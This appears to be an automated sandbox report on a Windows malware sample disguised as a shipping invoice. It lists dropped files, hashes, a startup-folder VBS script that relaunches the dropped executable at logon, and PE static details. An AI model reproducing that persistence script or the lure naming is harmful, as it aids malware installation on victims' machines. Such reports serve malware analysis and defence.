Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="446205" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107416
Entropy (8bit):	4.00146126861522
Encrypted:	false
SSDEEP:	768:Gl81kJGIqXWhjk0QsVWohnN5LxKNCjBlzTPieb6PR1vPqtOJd5m5oypQqW3/g3hY:XkZq4VWohtaeJ3hOihGxnlhEFOfKWB
MD5:	9F9198EAB2EE73A08AC473D869D4C070
SHA1:	E07A68E10997365DE2B55B0C255A0EC5C555BF46
SHA-256:	500B1AF973EBF54CD3E2784A600D1E83C24DDC00345BCA15264547B1CD49B399
SHA-512:	699145A300DB0AADC40DF28B69F45DB66AA1B7B1CA87D836C47867CA7F23DB4F2B682F2F6579F2976CE916024EDEDF3DDA661C45CBB5E94C3994DFC02CC057F9
Malicious:	false
Preview:	....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	107416
Entropy (8bit):	4.001734371574568
Encrypted:	false
SSDEEP:	768:pl8PkuGIqXWhjk0QsVWohnN5LxKNCjBlzTPieb6PR1vPqtOJd5m5oypQqW3/g3hy:gkAq4VWohtaeJ3hOihGxnlhEFOfKWT
MD5:	4DCAC9700FE92B44FF765D20DAA92871
SHA1:	8013F405D00B886BA66BED525D686CD4BA9CF0AA
SHA-256:	748CF37BCFAB4C5015042578911610CDDAD0880DD40CA71A689E1218C85F40F5
SHA-512:	3BEA6066F93F851E02CE67BF94BB5A9A3D9563ED142ABEBF0404F5913D3632D7D2210317BA694478905B35E0F87AE012F5CBE409093F8C72B56373FA85D54245
Malicious:	false
Preview:	....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Windows[2].json

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	713
Entropy (8bit):	5.125716386089798
Encrypted:	false
SSDEEP:	12:YWgc2TtlH+5ksi0YOmXeH+2yrZMAdrKC8K/y8kEUq1HLxycXNNZ/TCB893c3Z:Yzc2THHpBeHt0drc6UE14
MD5:	9DF018BE4A6E955617B6ECF550019758
SHA1:	72735F807B4E05E1343B83EF04F5B4FF7800BF3C
SHA-256:	F1CE8D3217DDCC9D0BD8ACAFA27E3F9FF3A9DBD4D38380D3F20D2753D9884F65
SHA-512:	6718CE76822D7834432D5BE600B5277B53B863E5FB5C6393CE48819FAF4A8F765E821D83A2E50E82D79599AE0E35A1BA9B07E20C90BC334C70C263CC97EE2AA0
Malicious:	false
Preview:	{"serviceContext":{"serviceActivityId":"66b45ad3-aadb-44b6-aecd-203c7cb85e34","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"66b45ad3-aadb-44b6-aecd-203c7cb85e34\|2024-08-08T05:42:44.1205295Z\|fabric_msn\|ESU\|News_493"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false},"isPartial":false}

C:\Users\user\AppData\Local\Temp\Okeghem

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	189952
Entropy (8bit):	7.873503870484802
Encrypted:	false
SSDEEP:	3072:gj4c0BP3xrQnPTtC4lz3xHhYeBF12d17MOb7DdDb9CqRdSNcq7uCB6EEY:gUcCPB0P9zBVBid17MYn9CqRE9NBN
MD5:	DBCB9855B67E210D080D2E1403F56A2E
SHA1:	AD5694CF00B3F428E7C0B7CB5553D4B106B152EB
SHA-256:	3577F2DA62B92766AEBCDE882FFDCC6E68AA89E62719C7BCCA162E78E1E40B5A
SHA-512:	95A5FFE088707BA151C5FB59CA022EF89AA32057673A984DCE630A2D3941B6D31D8FA5603F28F9DE20B78E11D9B2E0DB33427DC654755379659BBF8F67565F2E
Malicious:	false
Preview:	~.s..6HNKa.J...}.9;...mAF...3E6JR6HNK9YSCH0NGAP98O1PEBN83H.E6J\).@K.P.b.1..`.QQ<. 7-)JR%.&W$<Y<n)\y!6&.')a.vko\?!'`5>B.E6JR6HN8(l.t8k.p1...?j..D..B8h.nL..\|>...U...>...P['. ..N83H3E6J.sHN.8XSU...GAP98O1P.BL98I9E6.P6HNK9YSCH..FAP)8O1.GBN8sH3U6JR4HNN9XSCH0NBAQ98O1PE.L83J3E6JR6JN..YSSH0^GAP9(O1@EBN83H#E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSm<U63AP9<.3PERN83.1E6ZR6HNK9YSCH0NGAp98/1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9YSCH0NGAP98O1PEBN83H3E6JR6HNK9

C:\Users\user\AppData\Local\Temp\aut10C2.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	185708
Entropy (8bit):	7.9786424774458595
Encrypted:	false
SSDEEP:	3072:w9/P7AyjyulPbCNR1SSfEdPCoh3E0ht3Te4XJitaotxjHHuQ:w9X7AyjHczEd6oJE0T64ktaorjHHuQ
MD5:	13900728115BC9E464A82F15A402FC36
SHA1:	68353AA94A6D6DD8BC4ADFDD00646A9E1F24AEAA
SHA-256:	315CAAC20BD6AACFB0189D072356D5C0849C826BD7BFCD506636A2368011914F
SHA-512:	8655D9EC03F82BE3DB56BAC4213B5FA1D73591AA67AB3E290CADC34843C1C61CCB6F4169CF977B30C971D7ED748E82DC9A8021489081C454CA9F037E50C91C36
Malicious:	false
Preview:	EA06.....G.q...N..{[.W.....{s..;e...h.~.bgE.R.@...S..&..=..9.S.5.-..8..1`..rS.R.....1.b..J.Fy..M.UJK..U.....).^d3i4BO)....}r.!..&...\.k3.E.st.Z..../....1.&..B.Z?..f_.\|.D0.......G?..nO..G.`.......).y.b.U.k. .......&sE.g.....o......x.Q.-.."gU.x&..u:sX..T....6T.....U:.....t..x.i.S.4...H.C......sm.Uf.0..y...(. ..91..@....s8..K..@...............=...........V.e}..2...cgF.X..:4.....g.......Fc.=...l........8.V.5....D..k.-L..y.3nwC_..S.=..3u6....< ..\.h.:..+5..Q8.$....<.h.g....0..##..R0..N./<..).......(.J5....{.t.OGc...?..>.m...g........>..M....1=.7>3^....Z.....r'.:5<.k5......N......=.Wp..G+...P...}?...q.....!E.x._-$...F)...G...q..i.[q..,8..."c..a;......~6T>\.o..;~....Q.h..?...u..0.}N.i..8..z....'.O.o)..H7u..S.o...........L"........W....83).....d.0....]0=....5...\{...2.Y........T......o..5.Yv..x..x.....T..#.....U:..]..pl5>L....M..=.f....f6..?}u...^M2........q..L.V.F.c..i.......2.x..k...>.......A..N,zS.....(.29\.t)v~.;...Z...n....p....J.....\...0.X..H..w

C:\Users\user\AppData\Local\Temp\aut1111.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9798
Entropy (8bit):	7.632945449116072
Encrypted:	false
SSDEEP:	192:7zsoknxxSuLnhWgAI8o4i97xr3fiax+uDj9lN:fCnTSu9tt4iPr3fiajDjh
MD5:	85E8AB1310AA7CCFF7D96E49B6394EF5
SHA1:	A0F53C629DD518AA49188AF66660E91377A08380
SHA-256:	C5B24D222D7671AEC195C53E329D8FD782FE4A2BEB1DB9662C607BDD2B1E3288
SHA-512:	1DE95912FD16B1C802E69CC99CD9456CD53D5AE1265B75BE2DC5172E3B3C828442D5B0620F390749E55C06273142781CBFDE5494D555813C230E5306E469215C
Malicious:	false
Preview:	EA06..p........j..-..U.o9.......}i..m ...o=.......wi.Og..]........K........\|...o..i.Om@.....?.N...@..h......t...9.Z..y@..6...o.z..Z......g.@.N.V...Z....N..s.........@.N....r.'.....c ....Ah.H.....P.F.3<..[..6...\.n....' ...x..x....B......Z'.0.O-s{L.\|...Z. 5_..v.....5_..~.U....5_....U...5_..n.U..' 5\..>3...O@^.h.Z..y=.z..}=......@........G../Z..h......j......\|.u....$.../.}?...g.G_T.......>_.......zy<.............................`.M..`... ...j...@..`.'.;..@{>KL..c..-3...Zg.._..~....A.>KH#G.i..3\|v...G.;.. 8_..yj..i\|v.....j.h.-V.......U..>..-..m......;..?..'...L..6...f..+P.fg.....=...`...f...E...Y....3.............v............2p....<d....,vp...D......!+P.''.....,f}9.Z.v.......r.9.X...c3.\.sm.Y.!...Gg ....,f.@.O.. .#>.....c..........~.h.s.....,vt...L..t......40......g`..........4..@.6.-..p..S.e..9...S..N...;<.`..@...@...y?.....c....['..wx.....vz....... .E......y6....p.c3.]..;..b.!....F ...B5j...........v\|......f..].....B3......;?.X...h....X........g....Ng..e..j...

C:\Users\user\AppData\Local\Temp\autD446.tmp

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	185708
Entropy (8bit):	7.9786424774458595
Encrypted:	false
SSDEEP:	3072:w9/P7AyjyulPbCNR1SSfEdPCoh3E0ht3Te4XJitaotxjHHuQ:w9X7AyjHczEd6oJE0T64ktaorjHHuQ
MD5:	13900728115BC9E464A82F15A402FC36
SHA1:	68353AA94A6D6DD8BC4ADFDD00646A9E1F24AEAA
SHA-256:	315CAAC20BD6AACFB0189D072356D5C0849C826BD7BFCD506636A2368011914F
SHA-512:	8655D9EC03F82BE3DB56BAC4213B5FA1D73591AA67AB3E290CADC34843C1C61CCB6F4169CF977B30C971D7ED748E82DC9A8021489081C454CA9F037E50C91C36
Malicious:	false
Preview:	EA06.....G.q...N..{[.W.....{s..;e...h.~.bgE.R.@...S..&..=..9.S.5.-..8..1`..rS.R.....1.b..J.Fy..M.UJK..U.....).^d3i4BO)....}r.!..&...\.k3.E.st.Z..../....1.&..B.Z?..f_.\|.D0.......G?..nO..G.`.......).y.b.U.k. .......&sE.g.....o......x.Q.-.."gU.x&..u:sX..T....6T.....U:.....t..x.i.S.4...H.C......sm.Uf.0..y...(. ..91..@....s8..K..@...............=...........V.e}..2...cgF.X..:4.....g.......Fc.=...l........8.V.5....D..k.-L..y.3nwC_..S.=..3u6....< ..\.h.:..+5..Q8.$....<.h.g....0..##..R0..N./<..).......(.J5....{.t.OGc...?..>.m...g........>..M....1=.7>3^....Z.....r'.:5<.k5......N......=.Wp..G+...P...}?...q.....!E.x._-$...F)...G...q..i.[q..,8..."c..a;......~6T>\.o..;~....Q.h..?...u..0.}N.i..8..z....'.O.o)..H7u..S.o...........L"........W....83).....d.0....]0=....5...\{...2.Y........T......o..5.Yv..x..x.....T..#.....U:..]..pl5>L....M..=.f....f6..?}u...^M2........q..L.V.F.c..i.......2.x..k...>.......A..N,zS.....(.29\.t)v~.;...Z...n....p....J.....\...0.X..H..w

C:\Users\user\AppData\Local\Temp\autD4F3.tmp

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	9798
Entropy (8bit):	7.632945449116072
Encrypted:	false
SSDEEP:	192:7zsoknxxSuLnhWgAI8o4i97xr3fiax+uDj9lN:fCnTSu9tt4iPr3fiajDjh
MD5:	85E8AB1310AA7CCFF7D96E49B6394EF5
SHA1:	A0F53C629DD518AA49188AF66660E91377A08380
SHA-256:	C5B24D222D7671AEC195C53E329D8FD782FE4A2BEB1DB9662C607BDD2B1E3288
SHA-512:	1DE95912FD16B1C802E69CC99CD9456CD53D5AE1265B75BE2DC5172E3B3C828442D5B0620F390749E55C06273142781CBFDE5494D555813C230E5306E469215C
Malicious:	false
Preview:	EA06..p........j..-..U.o9.......}i..m ...o=.......wi.Og..]........K........\|...o..i.Om@.....?.N...@..h......t...9.Z..y@..6...o.z..Z......g.@.N.V...Z....N..s.........@.N....r.'.....c ....Ah.H.....P.F.3<..[..6...\.n....' ...x..x....B......Z'.0.O-s{L.\|...Z. 5_..v.....5_..~.U....5_....U...5_..n.U..' 5\..>3...O@^.h.Z..y=.z..}=......@........G../Z..h......j......\|.u....$.../.}?...g.G_T.......>_.......zy<.............................`.M..`... ...j...@..`.'.;..@{>KL..c..-3...Zg.._..~....A.>KH#G.i..3\|v...G.;.. 8_..yj..i\|v.....j.h.-V.......U..>..-..m......;..?..'...L..6...f..+P.fg.....=...`...f...E...Y....3.............v............2p....<d....,vp...D......!+P.''.....,f}9.Z.v.......r.9.X...c3.\.sm.Y.!...Gg ....,f.@.O.. .#>.....c..........~.h.s.....,vt...L..t......40......g`..........4..@.6.-..p..S.e..9...S..N...;<.`..@...@...y?.....c....['..wx.....vz....... .E......y6....p.c3.]..;..b.!....F ...B5j...........v\|......f..].....B3......;?.X...h....X........g....Ng..e..j...

C:\Users\user\AppData\Local\Temp\autD995.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	185708
Entropy (8bit):	7.9786424774458595
Encrypted:	false
SSDEEP:	3072:w9/P7AyjyulPbCNR1SSfEdPCoh3E0ht3Te4XJitaotxjHHuQ:w9X7AyjHczEd6oJE0T64ktaorjHHuQ
MD5:	13900728115BC9E464A82F15A402FC36
SHA1:	68353AA94A6D6DD8BC4ADFDD00646A9E1F24AEAA
SHA-256:	315CAAC20BD6AACFB0189D072356D5C0849C826BD7BFCD506636A2368011914F
SHA-512:	8655D9EC03F82BE3DB56BAC4213B5FA1D73591AA67AB3E290CADC34843C1C61CCB6F4169CF977B30C971D7ED748E82DC9A8021489081C454CA9F037E50C91C36
Malicious:	false
Preview:	EA06.....G.q...N..{[.W.....{s..;e...h.~.bgE.R.@...S..&..=..9.S.5.-..8..1`..rS.R.....1.b..J.Fy..M.UJK..U.....).^d3i4BO)....}r.!..&...\.k3.E.st.Z..../....1.&..B.Z?..f_.\|.D0.......G?..nO..G.`.......).y.b.U.k. .......&sE.g.....o......x.Q.-.."gU.x&..u:sX..T....6T.....U:.....t..x.i.S.4...H.C......sm.Uf.0..y...(. ..91..@....s8..K..@...............=...........V.e}..2...cgF.X..:4.....g.......Fc.=...l........8.V.5....D..k.-L..y.3nwC_..S.=..3u6....< ..\.h.:..+5..Q8.$....<.h.g....0..##..R0..N./<..).......(.J5....{.t.OGc...?..>.m...g........>..M....1=.7>3^....Z.....r'.:5<.k5......N......=.Wp..G+...P...}?...q.....!E.x._-$...F)...G...q..i.[q..,8..."c..a;......~6T>\.o..;~....Q.h..?...u..0.}N.i..8..z....'.O.o)..H7u..S.o...........L"........W....83).....d.0....]0=....5...\{...2.Y........T......o..5.Yv..x..x.....T..#.....U:..]..pl5>L....M..=.f....f6..?}u...^M2........q..L.V.F.c..i.......2.x..k...>.......A..N,zS.....(.29\.t)v~.;...Z...n....p....J.....\...0.X..H..w

C:\Users\user\AppData\Local\Temp\autDADE.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9798
Entropy (8bit):	7.632945449116072
Encrypted:	false
SSDEEP:	192:7zsoknxxSuLnhWgAI8o4i97xr3fiax+uDj9lN:fCnTSu9tt4iPr3fiajDjh
MD5:	85E8AB1310AA7CCFF7D96E49B6394EF5
SHA1:	A0F53C629DD518AA49188AF66660E91377A08380
SHA-256:	C5B24D222D7671AEC195C53E329D8FD782FE4A2BEB1DB9662C607BDD2B1E3288
SHA-512:	1DE95912FD16B1C802E69CC99CD9456CD53D5AE1265B75BE2DC5172E3B3C828442D5B0620F390749E55C06273142781CBFDE5494D555813C230E5306E469215C
Malicious:	false
Preview:	EA06..p........j..-..U.o9.......}i..m ...o=.......wi.Og..]........K........\|...o..i.Om@.....?.N...@..h......t...9.Z..y@..6...o.z..Z......g.@.N.V...Z....N..s.........@.N....r.'.....c ....Ah.H.....P.F.3<..[..6...\.n....' ...x..x....B......Z'.0.O-s{L.\|...Z. 5_..v.....5_..~.U....5_....U...5_..n.U..' 5\..>3...O@^.h.Z..y=.z..}=......@........G../Z..h......j......\|.u....$.../.}?...g.G_T.......>_.......zy<.............................`.M..`... ...j...@..`.'.;..@{>KL..c..-3...Zg.._..~....A.>KH#G.i..3\|v...G.;.. 8_..yj..i\|v.....j.h.-V.......U..>..-..m......;..?..'...L..6...f..+P.fg.....=...`...f...E...Y....3.............v............2p....<d....,vp...D......!+P.''.....,f}9.Z.v.......r.9.X...c3.\.sm.Y.!...Gg ....,f.@.O.. .#>.....c..........~.h.s.....,vt...L..t......40......g`..........4..@.6.-..p..S.e..9...S..N...;<.`..@...@...y?.....c....['..wx.....vz....... .E......y6....p.c3.]..;..b.!....F ...B5j...........v\|......f..].....B3......;?.X...h....X........g....Ng..e..j...

C:\Users\user\AppData\Local\Temp\molecast

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5884077472816505
Encrypted:	false
SSDEEP:	768:zOuVKtIXQWYw6zZgb+bUwCzFptdX9xDMPUuXbf12lZ+pTPpY9nx7lyilDxZTh:zNnrKVP0yilzh
MD5:	EE4CF49F57DBE9B317975148FC646C5A
SHA1:	D108703EB6FCD1CCE8EC0D2EF6CD0A8724DE207D
SHA-256:	B9D18F83221F16F2F21FF6596E108562172C0E51EE1E78FAE29FD4D512F9DC54
SHA-512:	5178A4E46D5D964F6AE9352749DCB29402AC6F75F85B117D4179FB04AF1FD4FAF8C2F588D1CB62D107E67FA9A3C4212C5C60BD9ADA662F7989EEC9ACDF6732DA
Malicious:	false
Preview:	7.<<?ilj?8ljjj797777<=<>i?=i777777==?@;<?;i@=<777777==?@;k?=ih>9777777==?@<<??i?=l777777==?@;<?hi@=<777777==?@;k?jih=j777777==?@<<?li?::777777==?@;<@7i@:9777777==?@;k@9ih9l777777==?@<<@;i?=;777777==?@;<@=i@=j777777==?@;k@?ih=j777777==?@<<@h::j7==?@;<@ji@=l777777==?@?k;;mmmmmmih>;777777==?@@<;=mmmmmmi?=;777777==?@?<;?mmmmmmi@=j777777==?@?k;hmmmmmmih=j777777==?@@<;jmmmmmmi?9l777777==?@?<;lmmmmmmi@=;777777==?@?k<7mmmmmmih=j777777==?@@<<9mmmmmmi?=j777777==?@?<<;mmmmmm::j@==?@?k<=mmmmmmih><777777==?@<<k7i?>:777777==?@;<k9i@=<777777==?@;kk;ih>9777777==?@<<k=i?::777777==?@;<k?i@:9777777==?@;kkhih9l777777==?@<<kji?=;777777==?@;<kli@=j777777==?@;kl7ih=j777777==?@<<l9::j7==?@;<l;i@=8777777==?@?k=?mmmmmmih=;777777==?@@<=hmmmmmmi?>=777777==?@?<=jmmmmmmi@=8777777==?@?k=lmmmmmmih>7777777==?@@<>7mmmmmmi?=@777777==?@?<>9mmmmmmi@::777777==?@?k>;mmmmmmih:9777777==?@@<>=mmmmmmi?9l777777==?@?<>?mmmmmmi@=;777777==?@?k>hmmmmmmih=j777777==?@@<>jmmmmmmi?=j777777==?@?<>lmmmmmm::j@==?@;k?7ih>:777777==?@<<h7i?=?

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1145344
Entropy (8bit):	7.006978595704728
Encrypted:	false
SSDEEP:	24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8a4dz681iuw:nTvC/MTQYxsWR7a4h6Eiu
MD5:	6BBFDED2BAA5A18CC97D10516EE91C78
SHA1:	9E39944C9D057D134B119C677BE07975704E546E
SHA-256:	636597DD8C59135BE43119197EE60DB2268ABAA5D8A60F4C0AC296ACD9DC444F
SHA-512:	4D952C2ED6A876BD639B2A9E4BAA5EEADBF01F314BCD1A2C80DA564C4594330A5B26DC351C528B5C0D574E7013B387349CE77A274257B0DF902A48E707545605
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...3..f..........".................w.............@.................................o.....@...@.......@.....................d...\|....@.......................P...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...P...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	270
Entropy (8bit):	3.417626411866224
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclwL1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlwBQ1A1z4mA2n
MD5:	351EC8C2B40C00A311F6BAD2F7D440D6
SHA1:	ADA0755D548E4B6257B50D665E6CEB9ECF221955
SHA-256:	DCC00A312BA3D4049532E70CA0F9E2BE03A22C633F09123DEBDA40F021EE9443
SHA-512:	150DF05A0B2E481848D6CA49CE5E0C38FCD4F76BB814A1838F9B9F5DE7425BD80FD2EF3B2B2A77DDCD47446D65395817E651A4E9D9636F483BB70DD0944B039B
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.006978595704728
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
File size:	1'145'344 bytes
MD5:	6bbfded2baa5a18cc97d10516ee91c78
SHA1:	9e39944c9d057d134b119c677be07975704e546e
SHA256:	636597dd8c59135be43119197ee60db2268abaa5d8a60f4c0ac296acd9dc444f
SHA512:	4d952c2ed6a876bd639b2a9e4baa5eeadbf01f314bcd1a2c80da564c4594330a5b26dc351c528b5c0d574e7013b387349ce77a274257b0df902a48e707545605
SSDEEP:	24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8a4dz681iuw:nTvC/MTQYxsWR7a4h6Eiu
TLSH:	7F35BF0273C1D062FF9B96334B5AF6115BBC69260123E62F13981D7ABE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B2F733 [Wed Aug 7 04:25:23 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FA5B04C76E3h
jmp 00007FA5B04C6FEFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FA5B04C71CDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FA5B04C719Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FA5B04C9D8Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FA5B04C9DD8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FA5B04C9DC1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x40ea8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x115000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
